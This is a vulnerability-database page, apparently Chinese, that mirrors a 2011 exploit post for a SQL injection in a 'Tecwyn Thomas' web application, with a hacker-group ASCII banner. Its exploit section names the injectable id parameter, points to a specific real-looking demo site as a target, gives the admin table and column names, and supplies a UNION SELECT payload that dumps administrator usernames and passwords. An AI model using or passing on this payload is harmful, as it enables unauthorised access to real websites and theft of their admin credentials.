Tecwyn Thomas SQL Injection

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1048849 漏洞类型
发布时间 2011-08-12 更新时间 2011-08-12
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2011080073
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
|=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*-*-*-*-*=|
|*		 ______  ____     __  __     			                      |
|*		/\__  _\/\  _`\  /\ \/\ \       	                          |
|*		\/_/\ \/\ \ \L\ \\ \ \_\ \      	 { Turki$ hackers }       |
|*		   \ \ \ \ \  _ <'\ \  _  \   		                          |
|*		    \ \ \ \ \ \L\ \\ \ \ \ \                                  |
|*		     \ \_\ \ \____/ \ \_\ \_\			                      |
|*		      \/_/  \/___/   \/_/\/_/		                          |
|*				                                    				  |
|*								 								      |
|=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*-*-*-*-*=|
=======================================================================
\* [Title]	        :[Tecwyn Thomas sql injection vulnerability]        /*
\* [Author]	        :[skote_vahshat]                                 /*
\* [Home]	        :[Http://Skote-Vahshat.com]                      /*
\* [Archive]	    :[Http://xpl.skote-vahshat.com]                  /*
\* [Email] 	        :[skote.vahshat@Gmail.Com]                       /* 
=======================================================================
/* Web Server: Microsoft-IIS/6.0
/*Powered-by: ASP.NET
/* [+]Exploit :
/*              http://www.target.com/index2.php?id=[SQLi]
/* [+]Demo:
/*         http://www.alunpugh.com/index2.php?id=4[SQLi]
/* [+] talbe admin  (defnyddiwr)
/* [+] column ( usr_name , usr_wrd)
/* [+] union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,usr_name,16,usr_wrd+from+defnyddiwr
=======================================================================
|_***_| spical thanks : bl4ck.viper 				 all turkiS hackers|
=======================================================================